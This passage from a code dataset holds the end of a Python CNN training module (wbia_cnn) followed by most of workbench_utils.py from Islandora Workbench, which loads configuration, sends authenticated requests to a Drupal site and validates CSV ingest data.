    :param output_path: directory where the dataset/training state lives.
    :param data_fpath: path to the data array file.
    :param labels_fpath: path to the labels array file.
    :return: path of the saved model state.

    CommandLine:
        python -m wbia_cnn.train --test-train_background

    Example:
        >>> # DISABLE_DOCTEST
        >>> from wbia_cnn.models.background import *  # NOQA
        >>> result = train_background()
        >>> print(result)
    """
    era_size = 8
    max_epochs = 128
    # Hyperparameters, overridable from the command line via ut.argparse_dict.
    hyperparams = ut.argparse_dict(
        {
            'era_size': era_size,
            'era_clean': True,
            'batch_size': 128,
            'learning_rate': 0.01,
            'momentum': 0.9,
            'weight_decay': 0.0005,
            'augment_on': True,
            'whiten_on': True,
            'max_epochs': max_epochs,
        }
    )

    ut.colorprint('[netrun] Ensuring Dataset', 'yellow')
    dataset = ingest_data.get_numpy_dataset2(
        'background', data_fpath, labels_fpath, output_path
    )
    logger.info('dataset.training_dpath = %r' % (dataset.training_dpath,))

    ut.colorprint('[netrun] Architecture Specification', 'yellow')
    model = BackgroundModel(
        data_shape=dataset.data_shape,
        training_dpath=dataset.training_dpath,
        **hyperparams
    )

    ut.colorprint('[netrun] Initialize archchitecture', 'yellow')
    model.init_arch()

    # Resume from a saved state if one exists; otherwise start fresh.
    ut.colorprint('[netrun] * Initializing new weights', 'lightgray')
    if model.has_saved_state():
        model.load_model_state()
    else:
        model.reinit_weights()

    # ut.colorprint('[netrun] Need to initialize training state', 'yellow')
    # X_train, y_train = dataset.subset('train')
    # model.ensure_data_params(X_train, y_train)

    ut.colorprint('[netrun] Training Requested', 'yellow')
    # parse training arguments
    config = ut.argparse_dict(
        dict(
            era_size=era_size,
            max_epochs=max_epochs,
            show_confusion=False,
        )
    )
    model.monitor_config.update(**config)
    X_train, y_train = dataset.subset('train')
    X_valid, y_valid = dataset.subset('valid')

    # Map raw labels to integer class indices via the model's encoder.
    ut.colorprint('[netrun] Init encoder and convert labels', 'yellow')
    if hasattr(model, 'init_encoder'):
        model.init_encoder(y_train)
    if getattr(model, 'encoder', None) is not None:
        class_list = list(model.encoder.classes_)
        y_train = np.array([class_list.index(_) for _ in y_train])
        y_valid = np.array([class_list.index(_) for _ in y_valid])

    ut.colorprint('[netrun] Begin training', 'yellow')
    model.fit(X_train, y_train, X_valid=X_valid, y_valid=y_valid)

    model_path = model.save_model_state()
    return model_path
if __name__ == '__main__':
    """
    CommandLine:
        python -m wbia_cnn.models.background
        python -m wbia_cnn.models.background --allexamples
        python -m wbia_cnn.models.background --allexamples --noface --nosrc
    """
    import multiprocessing

    multiprocessing.freeze_support()  # for win32
    import utool as ut  # NOQA

    # Run this module's doctests via utool's harness.
    ut.doctest_funcs()
| 33.732558
| 90
| 0.600712
|
794afb6f3d50f01a6fc7fc77c4171bda43ba0fe8
| 136,212
|
py
|
Python
|
workbench_utils.py
|
DonRichards/islandora_workbench
|
292a9f72a62eecad31217c4eae1115323e7f3d8a
|
[
"Unlicense"
] | null | null | null |
workbench_utils.py
|
DonRichards/islandora_workbench
|
292a9f72a62eecad31217c4eae1115323e7f3d8a
|
[
"Unlicense"
] | null | null | null |
workbench_utils.py
|
DonRichards/islandora_workbench
|
292a9f72a62eecad31217c4eae1115323e7f3d8a
|
[
"Unlicense"
] | null | null | null |
import os
import sys
import json
import csv
import openpyxl
import time
import string
import re
import copy
import logging
import datetime
import requests
import subprocess
import hashlib
import mimetypes
import collections
import urllib.parse
import magic
from pathlib import Path
from ruamel.yaml import YAML, YAMLError
from functools import lru_cache
import shutil
yaml = YAML()
def set_config_defaults(args):
    """Convert the YAML configuration data into an array for easy use.

    Also set some sensible default config values.
    """
    # Bail out early if the config file is missing. The main logger gets its
    # log file location from this very config, so configure a local logger
    # writing to the default 'workbench.log' before reporting the error.
    if not os.path.exists(args.config):
        logging.basicConfig(
            filename='workbench.log',
            format='%(asctime)s - %(levelname)s - %(message)s',
            datefmt='%d-%b-%y %H:%M:%S')
        message = 'Error: Configuration file "' + args.config + '" not found.'
        logging.error(message)
        sys.exit(message)

    try:
        with open(args.config, 'r') as f:
            config_file_contents = f.read()
        original_config_data = yaml.load(config_file_contents)
        # Normalize all string keys to lower case.
        config_data = collections.OrderedDict()
        for k, v in original_config_data.items():
            config_data[k.lower() if isinstance(k, str) else k] = v
    except YAMLError as e:
        # Same bootstrap-logger situation as above.
        logging.basicConfig(
            filename='workbench.log',
            format='%(asctime)s - %(levelname)s - %(message)s',
            datefmt='%d-%b-%y %H:%M:%S')
        message = 'Error: There appears to be a YAML syntax error with the configuration file "' + args.config + '". ' \
            '\nIf you use an online YAML validator to find the error, *be sure to remove your Drupal hostname and user credentials first.*'
        logging.exception(message)
        sys.exit(message + "\n" + str(e))

    config = dict(config_data)

    # Global defaults, applied only where the config file is silent.
    for key, value in [
            ('input_dir', 'input_data'),
            ('input_csv', 'metadata.csv'),
            ('media_use_tid', 'http://pcdm.org/use#OriginalFile'),
            ('drupal_filesystem', 'fedora://'),
            ('id_field', 'id'),
            ('content_type', 'islandora_object'),
            ('delimiter', ','),
            ('subdelimiter', '|'),
            ('log_file_path', 'workbench.log'),
            ('log_file_mode', 'a'),
            ('allow_missing_files', False),
            ('update_mode', 'replace'),
            ('validate_title_length', True),
            ('paged_content_from_directories', False),
            ('delete_media_with_nodes', True),
            ('allow_adding_terms', False),
            ('nodes_only', False),
            ('log_json', False),
            ('progress_bar', False),
            ('user_agent', 'Islandora Workbench'),
            ('allow_redirects', True),
            ('google_sheets_csv_filename', 'google_sheet.csv'),
            ('google_sheets_gid', '0'),
            ('excel_worksheet', 'Sheet1'),
            ('excel_csv_filename', 'excel.csv'),
            ('use_node_title_for_media', False),
            ('delete_tmp_upload', False)]:
        config.setdefault(key, value)

    if config['task'] == 'create':
        # Kept for parity with the original flow; 'id_field' is already
        # defaulted above, so this is a no-op.
        config.setdefault('id_field', 'id')

    if config['task'] in ('create', 'create_from_files'):
        config.setdefault('published', 1)

    if config['task'] in ('create', 'add_media', 'create_from_files'):
        # Flatten the list-of-single-key-dicts preprocessor config into one map.
        if 'preprocessors' in config_data:
            config['preprocessors'] = {}
            for preprocessor in config_data['preprocessors']:
                for key, value in preprocessor.items():
                    config['preprocessors'][key] = value

        # Default file-extension to media-bundle mappings.
        if 'media_types' not in config:
            config['media_types'] = []
            for bundle, extensions in (
                    ('image', ['png', 'gif', 'jpg', 'jpeg']),
                    ('document', ['pdf', 'doc', 'docx', 'ppt', 'pptx']),
                    ('file', ['tif', 'tiff', 'jp2', 'zip', 'tar']),
                    ('audio', ['mp3', 'wav', 'aac']),
                    ('video', ['mp4']),
                    ('extracted_text', ['txt'])):
                config['media_types'].append(collections.OrderedDict({bundle: extensions}))

    if config['task'] == 'create':
        # NOTE: 'seprator' misspelling is the key used elsewhere; keep it.
        config.setdefault('paged_content_sequence_seprator', '-')
        if 'paged_content_page_content_type' not in config:
            config['paged_content_page_content_type'] = config['content_type']

    # Mirror the relevant command-line flags into the config.
    config['check'] = True if args.check else False
    config['get_csv_template'] = True if args.get_csv_template else False

    return config
def set_media_type(filepath, config):
    """Determine which media bundle type to use for a file.

    A single 'media_type' config value wins outright; otherwise the file's
    (lowercased) extension is looked up in the 'media_types' list of
    extension-to-bundle maps. Unrecognized extensions fall back to the
    generic 'file' bundle.
    """
    if 'media_type' in config:
        return config['media_type']

    extension = os.path.splitext(filepath)[1][1:].lower()
    for mapping in config['media_types']:
        for bundle, extensions in mapping.items():
            if extension in extensions:
                return bundle

    # Extension isn't listed anywhere: default to the 'file' bundle.
    return 'file'
def set_model_from_extension(file_name, config):
    """Determine the Islandora Model term ID for a node created from a file.

    Only meaningful for the 'create_from_files' task (returns None for any
    other task). A single 'model' config value wins outright; otherwise the
    file's (lowercased) extension is looked up in the 'models' list of
    term-ID-to-extensions maps. A mapping that lists the empty extension ''
    acts as the catch-all fallback. Returns None if nothing matches and no
    fallback is configured.
    """
    if config['task'] != 'create_from_files':
        return None
    if 'model' in config:
        return config['model']

    extension = os.path.splitext(file_name)[1][1:].lower()
    fallback_tid = None
    for model_tids in config['models']:
        for tid, extensions in model_tids.items():
            # Term URIs are resolved to numeric term IDs before use.
            if str(tid).startswith('http'):
                tid = get_term_id_from_uri(config, tid)
            if extension in extensions:
                return tid
            # Bug fix: the original returned the first catch-all ('') entry
            # immediately, shadowing explicit matches in later mappings.
            # Remember the first catch-all but keep scanning.
            if fallback_tid is None and '' in extensions:
                fallback_tid = tid
    return fallback_tid
def issue_request(
        config,
        method,
        path,
        headers=None,
        json='',
        data='',
        query=None):
    """Issue the HTTP request to Drupal.

    Parameters
    ----------
    config : dict
        Workbench configuration; supplies host, credentials, redirect
        behavior, 'user_agent', and an optional 'pause' between writes.
    method : str
        One of 'GET', 'HEAD', 'POST', 'PUT', 'PATCH', 'DELETE'.
    path : str
        Either an absolute URL or a path appended to config['host'].
    headers : dict, optional
        Extra request headers; the configured User-Agent is always added.
    json : any, optional
        JSON body for POST/PUT/PATCH requests.
    data : any, optional
        Raw body for POST/PUT/PATCH requests.
    query : dict, optional
        Query string parameters (used for GET only).

    Returns
    -------
    requests.Response
    """
    # Avoid mutable default arguments: the previous `headers=dict()` default
    # was mutated by the User-Agent update below, leaking state across calls.
    if headers is None:
        headers = dict()
    if query is None:
        query = {}
    if config['check'] is False:
        if 'pause' in config and method in ['POST', 'PUT', 'PATCH', 'DELETE']:
            time.sleep(config['pause'])
    headers.update({'User-Agent': config['user_agent']})
    config['host'] = config['host'].rstrip('/')
    if config['host'] in path:
        url = path
    else:
        url = config['host'] + path
    if method == 'GET':
        response = requests.get(
            url,
            allow_redirects=config['allow_redirects'],
            auth=(config['username'], config['password']),
            params=query,
            headers=headers
        )
    if method == 'HEAD':
        response = requests.head(
            url,
            allow_redirects=config['allow_redirects'],
            auth=(config['username'], config['password']),
            headers=headers
        )
    if method == 'POST':
        if config['log_json'] is True:
            logging.info(json)
        response = requests.post(
            url,
            allow_redirects=config['allow_redirects'],
            auth=(config['username'], config['password']),
            headers=headers,
            json=json,
            data=data
        )
    if method == 'PUT':
        if config['log_json'] is True:
            logging.info(json)
        response = requests.put(
            url,
            allow_redirects=config['allow_redirects'],
            auth=(config['username'], config['password']),
            headers=headers,
            json=json,
            data=data
        )
    if method == 'PATCH':
        if config['log_json'] is True:
            logging.info(json)
        response = requests.patch(
            url,
            allow_redirects=config['allow_redirects'],
            auth=(config['username'], config['password']),
            headers=headers,
            json=json,
            data=data
        )
    if method == 'DELETE':
        response = requests.delete(
            url,
            allow_redirects=config['allow_redirects'],
            auth=(config['username'], config['password']),
            headers=headers
        )
    return response
def ping_node(config, nid):
    """Check whether a node exists by issuing a HEAD request against it.

    Returns True when Drupal answers with HTTP 200; otherwise logs the
    unexpected status code and returns False.
    """
    url = config['host'] + '/node/' + nid + '?_format=json'
    # @todo: Add 301 and 302 to the allowed status codes?
    response = issue_request(config, 'HEAD', url)
    if response.status_code != 200:
        logging.warning(
            "Node ping (HEAD) on %s returned a %s status code",
            url,
            response.status_code)
        return False
    return True
def ping_url_alias(config, url_alias):
    """Ping the URL alias to see if it exists. Return the HTTP status code."""
    response = issue_request(
        config, 'GET', config['host'] + url_alias + '?_format=json')
    return response.status_code
def ping_islandora(config, print_message=True):
    """Verify connectivity and credentials against Islandora before making
    any other HTTP requests.

    Exits with an error if the host is unreachable, the Islandora Workbench
    Integration module appears to be disabled, or the configured user lacks
    sufficient permissions.
    """
    # This endpoint requires Administrator-level permissions, so a
    # successful response also validates the configured credentials.
    url = config['host'] + '/islandora_workbench_integration/upload_max_filesize'
    try:
        host_response = issue_request(config, 'GET', url)
    except requests.exceptions.Timeout as err_timeout:
        message = 'Workbench timed out trying to reach ' + \
            config['host'] + '. Please verify the "host" setting in your configuration ' + \
            'and check your network connection.'
        logging.error(message)
        logging.error(err_timeout)
        sys.exit('Error: ' + message)
    except requests.exceptions.ConnectionError as error_connection:
        message = 'Workbench cannot connect to ' + \
            config['host'] + '. Please verify the "host" setting in your configuration ' + \
            'and check your network connection.'
        logging.error(message)
        logging.error(error_connection)
        sys.exit('Error: ' + message)

    status = host_response.status_code
    if status == 404:
        message = 'Workbench cannot detect whether the Islandora Workbench Integration module is ' + \
            'enabled on ' + config['host'] + '. Please ensure it is enabled.'
        logging.error(message)
        sys.exit('Error: ' + message)
    if status in (401, 403):
        message = 'Workbench can connect to ' + \
            config['host'] + ' but the user "' + config['username'] + \
            '" does not have sufficient permissions to continue, or the credentials are invalid.'
        logging.error(message)
        sys.exit('Error: ' + message)

    message = "OK, connection to Drupal at " + config['host'] + " verified."
    if print_message:
        logging.info(message)
        print(message)
def ping_remote_file(url):
    '''Return the HTTP status code from a HEAD request on a remote file.

    Logging, exiting, etc. happens in caller, except on requests error.
    '''
    sections = urllib.parse.urlparse(url)
    try:
        return requests.head(url, allow_redirects=True).status_code
    except requests.exceptions.Timeout as err_timeout:
        message = 'Workbench timed out trying to reach ' + \
            sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
        logging.error(message)
        logging.error(err_timeout)
        sys.exit('Error: ' + message)
    except requests.exceptions.ConnectionError as error_connection:
        message = 'Workbench cannot connect to ' + \
            sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
        logging.error(message)
        logging.error(error_connection)
        sys.exit('Error: ' + message)
def get_field_definitions(config):
    """Assemble field definitions for the configured content type from
    Drupal's field config and field storage REST endpoints.

    Returns a dict keyed by field machine name. Each value records the
    field's entity type, requiredness, label, type, cardinality, length and
    target-type constraints, plus vocabulary and typed-relation details
    where applicable. A definition for the base 'title' field is appended
    manually since it has no field config of its own.
    """
    ping_islandora(config, print_message=False)
    # For media, entity_type will need to be 'media' and bundle_type will
    # need to be one of 'image', 'document', 'audio', 'video', 'file'.
    entity_type = 'node'
    bundle_type = config['content_type']

    field_definitions = {}
    for fieldname in get_entity_fields(config, entity_type, bundle_type):
        field_config = json.loads(
            get_entity_field_config(config, fieldname, entity_type, bundle_type))

        definition = {
            'entity_type': field_config['entity_type'],
            'required': field_config['required'],
            'label': field_config['label'],
        }

        # Vocabulary machine names are recoverable from the field's config
        # dependencies ('taxonomy.vocabulary.<name>').
        vocabularies = [
            dep.replace("taxonomy.vocabulary.", '')
            for dep in field_config['dependencies']['config']
            if re.match("^taxonomy.vocabulary.", dep)]
        if len(vocabularies) > 0:
            definition['vocabularies'] = vocabularies

        if entity_type == 'media' and 'file_extensions' in field_config['settings']:
            definition['file_extensions'] = field_config['settings']['file_extensions']
        if entity_type == 'media':
            definition['media_type'] = bundle_type

        field_storage = json.loads(
            get_entity_field_storage(config, fieldname, entity_type))
        definition['field_type'] = field_storage['type']
        definition['cardinality'] = field_storage['cardinality']
        definition['max_length'] = field_storage['settings'].get('max_length')
        definition['target_type'] = field_storage['settings'].get('target_type')
        if field_storage['type'] == 'typed_relation' and 'rel_types' in field_config['settings']:
            definition['typed_relations'] = field_config['settings']['rel_types']

        field_definitions[fieldname] = definition

    # 'title' is a base field with no field config, so define it by hand.
    field_definitions['title'] = {
        'entity_type': 'node',
        'required': True,
        'label': 'Title',
        'field_type': 'string',
        'cardinality': 1,
        'max_length': 255,
        'target_type': None}
    return field_definitions
def get_entity_fields(config, entity_type, bundle_type):
    """Get the machine names of all fields configured on a bundle.

    Queries the bundle's default entity form display and extracts field
    names from its config dependencies. Exits with an error if the
    required REST resources are not enabled in Drupal.
    """
    fields_endpoint = config['host'] + '/entity/entity_form_display/' + \
        entity_type + '.' + bundle_type + '.default?_format=json'
    bundle_type_response = issue_request(config, 'GET', fields_endpoint)
    fields = []
    if bundle_type_response.status_code == 200:
        node_config_raw = json.loads(bundle_type_response.text)
        # Field dependencies look like 'field.field.<entity>.<bundle>.<name>';
        # strip the prefix to recover the field machine name. (A previous
        # version also built an unused list with a hardcoded 'node' prefix
        # and recomputed the prefix on every iteration.)
        fieldname_prefix = 'field.field.' + entity_type + '.' + bundle_type + '.'
        for fieldname in node_config_raw['dependencies']['config']:
            if re.match(fieldname_prefix, fieldname):
                fields.append(fieldname.replace(fieldname_prefix, ''))
    else:
        message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
        logging.error(message)
        sys.exit('Error: ' + message)
    return fields
def get_entity_field_config(config, fieldname, entity_type, bundle_type):
    """Fetch a single field's configuration from Drupal as raw JSON text.

    Exits with an error if the field config REST resource is unavailable.
    """
    endpoint = (config['host'] + '/entity/field_config/' +
                entity_type + '.' + bundle_type + '.' + fieldname + '?_format=json')
    response = issue_request(config, 'GET', endpoint)
    if response.status_code != 200:
        message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
        logging.error(message)
        sys.exit('Error: ' + message)
    return response.text
def get_entity_field_storage(config, fieldname, entity_type):
    """Fetch a single field's storage configuration from Drupal as raw
    JSON text.

    Exits with an error if the field storage REST resource is unavailable.
    """
    endpoint = (config['host'] + '/entity/field_storage_config/' +
                entity_type + '.' + fieldname + '?_format=json')
    response = issue_request(config, 'GET', endpoint)
    if response.status_code != 200:
        message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
        logging.error(message)
        sys.exit('Error: ' + message)
    return response.text
def check_input(config, args):
    """Validate the config file and input data.

    Performs task-specific checks on the configuration file, the input CSV
    (headers, row widths, required columns, field values) and any files or
    page directories referenced from the CSV. Exits with an error message
    on the first fatal problem, or with status 0 when all checks pass.
    """
    logging.info(
        'Starting configuration check for "%s" task using config file %s.',
        config['task'],
        args.config)
    ping_islandora(config, print_message=False)
    # Drupal base fields allowed as CSV columns alongside configured fields.
    base_fields = ['title', 'status', 'promote', 'sticky', 'uid', 'created']
    # Check the config file.
    tasks = [
        'create',
        'update',
        'delete',
        'add_media',
        'delete_media',
        'create_from_files']
    joiner = ', '
    if config['task'] not in tasks:
        # Message now lists every valid task; "delete_media" was missing.
        message = '"task" in your configuration file must be one of "create", "update", "delete", "add_media", "delete_media", or "create_from_files".'
        logging.error(message)
        sys.exit('Error: ' + message)
    config_keys = list(config.keys())
    config_keys.remove('check')
    # Check for presence of required config keys, which varies by task.
    if config['task'] == 'create':
        if config['nodes_only'] is True:
            message = '"nodes_only" option in effect. Media files will not be checked/validated.'
            print(message)
            logging.info(message)
        create_required_options = [
            'task',
            'host',
            'username',
            'password']
        for create_required_option in create_required_options:
            if create_required_option not in config_keys:
                # Fixed NameError: previously joined the undefined name
                # 'create_options'.
                message = 'Please check your config file for required values: ' \
                    + joiner.join(create_required_options) + '.'
                logging.error(message)
                sys.exit('Error: ' + message)
    if config['task'] == 'update':
        update_required_options = [
            'task',
            'host',
            'username',
            'password']
        for update_required_option in update_required_options:
            if update_required_option not in config_keys:
                message = 'Please check your config file for required values: ' \
                    + joiner.join(update_required_options) + '.'
                logging.error(message)
                sys.exit('Error: ' + message)
        update_mode_options = ['replace', 'append', 'delete']
        if config['update_mode'] not in update_mode_options:
            message = 'Your "update_mode" config option must be one of the following: ' \
                + joiner.join(update_mode_options) + '.'
            logging.error(message)
            sys.exit('Error: ' + message)
    if config['task'] == 'delete':
        delete_required_options = [
            'task',
            'host',
            'username',
            'password']
        for delete_required_option in delete_required_options:
            if delete_required_option not in config_keys:
                message = 'Please check your config file for required values: ' \
                    + joiner.join(delete_required_options) + '.'
                logging.error(message)
                sys.exit('Error: ' + message)
    if config['task'] == 'add_media':
        add_media_required_options = [
            'task',
            'host',
            'username',
            'password']
        for add_media_required_option in add_media_required_options:
            if add_media_required_option not in config_keys:
                message = 'Please check your config file for required values: ' \
                    + joiner.join(add_media_required_options) + '.'
                logging.error(message)
                sys.exit('Error: ' + message)
    if config['task'] == 'delete_media':
        delete_media_required_options = [
            'task',
            'host',
            'username',
            'password']
        for delete_media_required_option in delete_media_required_options:
            if delete_media_required_option not in config_keys:
                message = 'Please check your config file for required values: ' \
                    + joiner.join(delete_media_required_options) + '.'
                logging.error(message)
                sys.exit('Error: ' + message)
    message = 'OK, configuration file has all required values (did not check for optional values).'
    print(message)
    logging.info(message)
    # Check existence of CSV file.
    if os.path.isabs(config['input_csv']):
        input_csv = config['input_csv']
    # The actual "extraction" is fired over in workbench.
    elif config['input_csv'].startswith('http'):
        input_csv = os.path.join(config['input_dir'], config['google_sheets_csv_filename'])
        message = "Extracting CSV data from " + config['input_csv'] + " (worksheet gid " + str(config['google_sheets_gid']) + ") to " + input_csv + '.'
        print(message)
        logging.info(message)
    elif config['input_csv'].endswith('xlsx'):
        input_csv = os.path.join(config['input_dir'], config['excel_csv_filename'])
        message = "Extracting CSV data from " + config['input_csv'] + " to " + input_csv + '.'
        print(message)
        logging.info(message)
    else:
        input_csv = os.path.join(config['input_dir'], config['input_csv'])
    if os.path.exists(input_csv):
        message = 'OK, CSV file ' + input_csv + ' found.'
        print(message)
        logging.info(message)
    else:
        message = 'CSV file ' + input_csv + ' not found.'
        logging.error(message)
        sys.exit('Error: ' + message)
    # Check column headers in CSV file.
    csv_data = get_csv_data(config)
    csv_column_headers = csv_data.fieldnames
    # Check whether each row contains the same number of columns as there are headers.
    count = 0  # Stays 0 when the CSV contains no data rows.
    for count, row in enumerate(csv_data, start=1):
        string_field_count = 0
        for field in row:
            if (row[field] is not None):
                string_field_count += 1
        if len(csv_column_headers) > string_field_count:
            logging.error("Row %s of your CSV file does not " +
                          "have same number of columns (%s) as there are headers " +
                          "(%s).", str(count), str(string_field_count), str(len(csv_column_headers)))
            sys.exit("Error: Row " +
                     str(count) +
                     " of your CSV file " +
                     "does not have same number of columns (" +
                     str(string_field_count) +
                     ") as there are headers (" +
                     str(len(csv_column_headers)) +
                     ").")
        if len(csv_column_headers) < string_field_count:
            logging.error("Row %s of your CSV file has more columns (%s) than there are headers " +
                          "(%s).", str(count), str(string_field_count), str(len(csv_column_headers)))
            sys.exit("Error: Row " +
                     str(count) +
                     " of your CSV file " +
                     "has more columns (" + str(string_field_count) + ") than there are headers (" +
                     str(len(csv_column_headers)) +
                     ").")
    message = "OK, all " \
        + str(count) + " rows in the CSV file have the same number of columns as there are headers (" \
        + str(len(csv_column_headers)) + ")."
    print(message)
    logging.info(message)
    # Task-specific CSV checks.
    langcode_was_present = False
    if config['task'] == 'create':
        field_definitions = get_field_definitions(config)
        if config['id_field'] not in csv_column_headers:
            message = 'For "create" tasks, your CSV file must have a column containing a unique identifier.'
            logging.error(message)
            sys.exit('Error: ' + message)
        if config['nodes_only'] is False and 'file' not in csv_column_headers and config['paged_content_from_directories'] is False:
            message = 'For "create" tasks, your CSV file must contain a "file" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
        if 'title' not in csv_column_headers:
            message = 'For "create" tasks, your CSV file must contain a "title" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
        if 'output_csv' in config.keys():
            if os.path.exists(config['output_csv']):
                message = 'Output CSV already exists at ' + \
                    config['output_csv'] + ', records will be appended to it.'
                print(message)
                logging.info(message)
        if 'url_alias' in csv_column_headers:
            validate_url_aliases_csv_data = get_csv_data(config)
            validate_url_aliases(config, validate_url_aliases_csv_data)
        # Specific to creating paged content. Current, if 'parent_id' is present
        # in the CSV file, so must 'field_weight' and 'field_member_of'.
        if 'parent_id' in csv_column_headers:
            if ('field_weight' not in csv_column_headers or 'field_member_of' not in csv_column_headers):
                message = 'If your CSV file contains a "parent_id" column, it must also contain "field_weight" and "field_member_of" columns.'
                logging.error(message)
                sys.exit('Error: ' + message)
        drupal_fieldnames = []
        for drupal_fieldname in field_definitions:
            drupal_fieldnames.append(drupal_fieldname)
        if len(drupal_fieldnames) == 0:
            message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
            logging.error(message)
            sys.exit('Error: ' + message)
        # We .remove() CSV column headers for this check because they are not Drupal field names (including 'langcode').
        # Any new columns introduced into the CSV need to be removed here.
        if config['id_field'] in csv_column_headers:
            csv_column_headers.remove(config['id_field'])
        if 'file' in csv_column_headers:
            csv_column_headers.remove('file')
        if 'node_id' in csv_column_headers:
            csv_column_headers.remove('node_id')
        if 'parent_id' in csv_column_headers:
            csv_column_headers.remove('parent_id')
        if 'image_alt_text' in csv_column_headers:
            csv_column_headers.remove('image_alt_text')
        if 'url_alias' in csv_column_headers:
            csv_column_headers.remove('url_alias')
        # langcode is a standard Drupal field but it doesn't show up in any field configs.
        if 'langcode' in csv_column_headers:
            csv_column_headers.remove('langcode')
            # Set this so we can validate langcode below.
            langcode_was_present = True
        for csv_column_header in csv_column_headers:
            if csv_column_header not in drupal_fieldnames and csv_column_header not in base_fields:
                logging.error(
                    "CSV column header %s does not match any Drupal field names.",
                    csv_column_header)
                sys.exit(
                    'Error: CSV column header "' +
                    csv_column_header +
                    '" does not match any Drupal field names.')
        message = 'OK, CSV column headers match Drupal field names.'
        print(message)
        logging.info(message)
    # Check that Drupal fields that are required are in the CSV file (create task only).
    if config['task'] == 'create':
        required_drupal_fields = []
        for drupal_fieldname in field_definitions:
            # In the create task, we only check for required fields that apply to nodes.
            if 'entity_type' in field_definitions[drupal_fieldname] and field_definitions[
                    drupal_fieldname]['entity_type'] == 'node':
                if 'required' in field_definitions[drupal_fieldname] and field_definitions[
                        drupal_fieldname]['required'] is True:
                    required_drupal_fields.append(drupal_fieldname)
        for required_drupal_field in required_drupal_fields:
            if required_drupal_field not in csv_column_headers:
                logging.error(
                    "Required Drupal field %s is not present in the CSV file.",
                    required_drupal_field)
                sys.exit(
                    'Error: Field "' +
                    required_drupal_field +
                    '" required for content type "' +
                    config['content_type'] +
                    '" is not present in the CSV file.')
        message = 'OK, required Drupal fields are present in the CSV file.'
        print(message)
        logging.info(message)
        # Validate dates in 'created' field, if present.
        if 'created' in csv_column_headers:
            validate_node_created_csv_data = get_csv_data(config)
            validate_node_created_date(validate_node_created_csv_data)
        # Validate user IDs in 'uid' field, if present.
        if 'uid' in csv_column_headers:
            validate_node_uid_csv_data = get_csv_data(config)
            validate_node_uid(config, validate_node_uid_csv_data)
    if config['task'] == 'update':
        if 'node_id' not in csv_column_headers:
            message = 'For "update" tasks, your CSV file must contain a "node_id" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
        if 'url_alias' in csv_column_headers:
            validate_url_aliases_csv_data = get_csv_data(config)
            validate_url_aliases(config, validate_url_aliases_csv_data)
        field_definitions = get_field_definitions(config)
        drupal_fieldnames = []
        for drupal_fieldname in field_definitions:
            drupal_fieldnames.append(drupal_fieldname)
        if 'title' in csv_column_headers:
            csv_column_headers.remove('title')
        if 'url_alias' in csv_column_headers:
            csv_column_headers.remove('url_alias')
        if 'image_alt_text' in csv_column_headers:
            csv_column_headers.remove('image_alt_text')
        if 'file' in csv_column_headers:
            message = 'Error: CSV column header "file" is not allowed in update tasks.'
            logging.error(message)
            sys.exit(message)
        if 'node_id' in csv_column_headers:
            csv_column_headers.remove('node_id')
        for csv_column_header in csv_column_headers:
            if csv_column_header not in drupal_fieldnames:
                logging.error(
                    'CSV column header %s does not match any Drupal field names.',
                    csv_column_header)
                sys.exit(
                    'Error: CSV column header "' +
                    csv_column_header +
                    '" does not match any Drupal field names.')
        message = 'OK, CSV column headers match Drupal field names.'
        print(message)
        logging.info(message)
    # Parentheses added for clarity; 'and' already bound tighter than 'or'.
    if config['task'] == 'add_media' or (config['task'] == 'create' and config['nodes_only'] is False):
        validate_media_use_tid(config)
    if config['task'] == 'update' or config['task'] == 'create':
        validate_geolocation_values_csv_data = get_csv_data(config)
        validate_geolocation_fields(config, field_definitions, validate_geolocation_values_csv_data)
        validate_edtf_values_csv_data = get_csv_data(config)
        validate_edtf_fields(config, field_definitions, validate_edtf_values_csv_data)
        validate_csv_field_cardinality_csv_data = get_csv_data(config)
        validate_csv_field_cardinality(config, field_definitions, validate_csv_field_cardinality_csv_data)
        validate_csv_field_length_csv_data = get_csv_data(config)
        validate_csv_field_length(config, field_definitions, validate_csv_field_length_csv_data)
        # Validating values in CSV taxonomy fields requires a View installed by the Islandora Workbench Integration module.
        # If the View is not enabled, Drupal returns a 404. Use a dummy vocabulary ID or we'll get a 404 even if the View
        # is enabled.
        terms_view_url = config['host'] + '/vocabulary/dummyvid?_format=json'
        terms_view_response = issue_request(config, 'GET', terms_view_url)
        if terms_view_response.status_code == 404:
            logging.warning(
                'Not validating taxonomy term IDs used in CSV file. To use this feature, install the Islandora Workbench Integration module.')
            print('Warning: Not validating taxonomy term IDs used in CSV file. To use this feature, install the Islandora Workbench Integration module.')
        else:
            validate_taxonomy_field_csv_data = get_csv_data(config)
            warn_user_about_taxo_terms = validate_taxonomy_field_values(config, field_definitions, validate_taxonomy_field_csv_data)
            if warn_user_about_taxo_terms is True:
                print('Warning: Issues detected with validating taxonomy field values in the CSV file. See the log for more detail.')
            validate_csv_typed_relation_values_csv_data = get_csv_data(config)
            warn_user_about_typed_relation_terms = validate_typed_relation_field_values(config, field_definitions, validate_csv_typed_relation_values_csv_data)
            if warn_user_about_typed_relation_terms is True:
                print('Warning: Issues detected with validating typed relation field values in the CSV file. See the log for more detail.')
        # Validate length of 'title'.
        if config['validate_title_length']:
            validate_title_csv_data = get_csv_data(config)
            for count, row in enumerate(validate_title_csv_data, start=1):
                if len(row['title']) > 255:
                    message = "The 'title' column in row " + \
                        str(count) + " of your CSV file exceeds Drupal's maximum length of 255 characters."
                    logging.error(message)
                    sys.exit('Error: ' + message)
        # Validate existence of nodes specified in 'field_member_of'. This could be generalized out to validate node IDs in other fields.
        # See https://github.com/mjordan/islandora_workbench/issues/90.
        validate_field_member_of_csv_data = get_csv_data(config)
        for count, row in enumerate(
                validate_field_member_of_csv_data, start=1):
            if 'field_member_of' in csv_column_headers:
                parent_nids = row['field_member_of'].split(
                    config['subdelimiter'])
                for parent_nid in parent_nids:
